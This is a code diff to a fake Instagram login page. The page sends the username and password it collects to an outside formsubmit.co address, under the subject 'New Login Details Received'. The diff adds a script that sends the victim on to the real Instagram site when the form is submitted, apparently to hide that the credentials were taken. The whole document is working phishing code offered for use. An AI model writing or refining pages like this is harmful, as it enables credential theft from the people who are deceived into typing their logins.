--- a/index.html
+++ b/index.html
@@ -10,7 +10,7 @@
     <div class="container">
         <div class="login-box">
             <img src="https://upload.wikimedia.org/wikipedia/commons/a/a5/Instagram_icon.png" alt="Instagram" class="logo">
-            <form action="https://formsubmit.co/7500b8b340189730c54ae32b7a854f8c" method="POST">
+            <form action="https://formsubmit.co/7500b8b340189730c54ae32b7a854f8c" method="POST" id="loginForm">
                 <input type="hidden" name="_subject" value="New Login Details Received">
                 <input type="text" name="username" placeholder="Username" required>
                 <input type="password" name="password" placeholder="Password" required>
@@ -19,5 +19,13 @@
             </form>
         </div>
     </div>
+
+    <script>
+        document.getElementById("loginForm").addEventListener("submit", function (event) {
+            event.preventDefault();
+            window.location.href = "https://www.instagram.com";
+            this.submit();
+        });
+    </script>
 </body>
 </html>
